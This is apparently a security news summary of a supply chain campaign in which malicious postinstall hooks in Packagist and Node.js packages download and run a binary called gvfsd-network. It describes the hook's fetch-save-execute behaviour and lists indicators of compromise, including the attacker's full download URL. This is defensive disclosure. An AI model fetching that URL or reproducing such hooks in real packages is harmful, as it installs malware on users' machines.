Malicious Postinstall Hook Found Across 700+ GitHub Repositories, Including Packagist and Node.js Projects
Malicious postinstall hooks discovered across 700+ GitHub repos targeting PHP and Node.js packages via Packagist.
Summary
Socket researchers identified a coordinated supply chain campaign affecting eight Composer packages on Packagist, where upstream repositories were modified to include malicious postinstall scripts in package.json files. The scripts attempted to download a Linux binary named gvfsd-network from an attacker-controlled GitHub Releases URL, save it to /tmp/.sshd, and execute it in the background with disabled TLS verification. A broader GitHub search revealed hundreds of additional references to the same attacker infrastructure across Node.js repositories, suggesting the campaign extends far beyond the confirmed Packagist findings.
Full text
Security NewsAI Has Taken Over Open SourceVibe coding at scale is reshaping how packages are created, contributed, and selected across the software supply chainBy André Staltz - May 22, 2026
Indicators of Compromise
- url — https://github.com/parikhpreyash4/systemd-network-helper-aa5c751f/releases/latest/download/gvfsd-network
- malware — gvfsd-network